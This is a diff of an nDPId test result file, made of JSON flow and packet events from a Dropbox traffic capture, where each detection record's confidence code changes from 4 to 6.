@@ -2,104 +2,104 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1455907271481} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455907271481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1455907271481,"pkt":"CAAnmO\/hCAAnAERyCABFAAB8EMQAAIARN\/bAqDgBwKg4ZcSHRFwAaLRJQwM1AW9STXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMSBFRVQgMjAxNiJ9"} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455907271483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAAvXYVAAEAR64HAqDhlwKg4AURcxIcAG\/HjY0Q1AW9STYsvci9CdXMxN0NtZA=="} 
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1455907271585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907271585,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EM0AAIARN+7AqDgBwKg4ZcSHRFwAZzJrQgM1Anj4ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455907272856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907272856,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EWkAAIARN1LAqDgBwKg4ZcSORFwAZ7scQgMdqQeYckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjEyIEVFVCAyMDE2In0="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455907272858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1455907272858,"pkt":"CAAnAERyCAAnmO\/hCABFAAAuXhFAAEAR6vbAqDhlwKg4AURcxI4AGvHiYkQdqQeYiy9yL0J1czE3Q21k"} 
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455907272969,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1455907272969,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/EYMAAIARNzTAqDgBwKg4ZcSORFwAa8WlRgMdqhF5z0YYRXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMyBFRVQgMjAxNiJ9"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455907274088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1455907274088,"pkt":"CAAnmO\/hCAAnAERyCABFAAB9EncAAIARNkLAqDgBwKg4ZcSIRFwAaR7GRANSj9XGl0FyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTQgRUVUIDIwMTYifQ=="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455907274089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1455907274089,"pkt":"CAAnAERyCAAnmO\/hCABFAAAwXqNAAEAR6mLAqDhlwKg4AURcxIgAHPHkZERSj9XGl0GLL3IvQnVzMTdDbWQ="} 
00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455907274193,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1455907274193,"pkt":"CAAnmO\/hCAAnAERyCABFAACBEpIAAIARNiPAqDgBwKg4ZcSIRFwAbeMnSANSkLugNTWCkTE2ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjE0IEVFVCAyMDE2In0="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455907275690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1455907275690,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/FCAAAIARNJfAqDgBwKg4ZcSPRFwAa2JLRgOAZtDWwMpn\/nJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxNSBFRVQgMjAxNiJ9"} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455907275695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1455907275695,"pkt":"CAAnAERyCAAnmO\/hCABFAAAyX35AAEAR6YXAqDhlwKg4AURcxI8AHvHmZkSAZtDWwMpn\/osvci9CdXMxN0NtZA=="} 
00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455907275831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1455907275831,"pkt":"CAAnmO\/hCAAnAERyCABFAACAFEwAAIARNGrAqDgBwKg4ZcSPRFwAbLkURwOAZ6ExGoh1VzNyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTUgRUVUIDIwMTYifQ=="} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","packets-captured":801,"packets-processed":800,"total-skipped-flows":0,"total-l4-payload-len":47076,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":4,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1459182796665} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182796665,"flow_last_seen":1459182796665,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1459182796665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182796665,"pkt":"8IQvSpdgeJKcD6iOCABFAABAOLtAAEARfTrAqAFpwKgB\/thvADUALFKSg5wBAAABAAAAAAAABmNsaWVudAdkcm9wYm94A2NvbQAAAQAB"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182796665,"flow_last_seen":1459182796665,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":801,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182796665,"flow_last_seen":1459182796665,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182796665,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": 
{"query":"client.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1459182796665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182796665,"pkt":"8IQvSpdgeJKcD6iOCABFAABAOLtAAEARfTrAqAFpwKgB\/thvADUALFKSg5wBAAABAAAAAAAABmNsaWVudAdkcm9wYm94A2NvbQAAAQAB"} 00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1459182796786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1459182796786,"pkt":"eJKcD6iO8IQvSpdgCABFAAE\/AABAAEARtPbAqAH+wKgBaQA12G8BK6cig5yBgAABAAMABAAEBmNsaWVudAdkcm9wYm94A2NvbQAAAQABwAwABQABAAAAwAALBmNsaWVudAF2wBPAMAABAAEAAAAUAARsoKzMwDAAAQABAAAAFAAEbKCs7MA3AAIAAQAA9bUAGQducy0xOTI2CWF3c2Rucy00OAJjbwJ1awDANwACAAEAAPW1ABYGbnMtNzczCWF3c2Rucy0zMgNuZXQAwDcAAgABAAD1tQASBW5zLTU3CWF3c2Rucy0wN8AbwDcAAgABAAD1tQAXB25zLTEyNzYJYXdzZG5zLTMxA29yZwDArgABAAEAAkcJAATN+8A5wIwAAQABAAJG7wAEzfvDBcDMAAEAAQACRu8ABM37xPzAZwABAAEAAkbkAATN+8eG"} 
-00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":803,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1459182796786,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.204"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":803,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1459182796786,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.204"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798602,"flow_last_seen":1459182798602,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1459182798602,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1459182798602,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1459182798602,"pkt":"8IQvSpdgeJKcD6iOCABFAABDOVFAAEARfKHAqAFpwKgB\/r\/YADUALxT2I4YBAAABAAAAAAAACWNsaWVudC1jZgdkcm9wYm94A2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798602,"flow_last_seen":1459182798602,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1459182798602,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798602,"flow_last_seen":1459182798602,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1459182798602,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1459182798602,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1459182798602,"pkt":"8IQvSpdgeJKcD6iOCABFAABDOVFAAEARfKHAqAFpwKgB\/r\/YADUALxT2I4YBAAABAAAAAAAACWNsaWVudC1jZgdkcm9wYm94A2NvbQAAAQAB"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798651,"flow_last_seen":1459182798651,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1459182798651,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1459182798651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1459182798651,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7OV1AAEARfJ3AqAFpwKgB\/sZlADUAJw161e8BAAABAAAAAAAAAWQHZHJvcGJveANjb20AAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798651,"flow_last_seen":1459182798651,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1459182798651,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 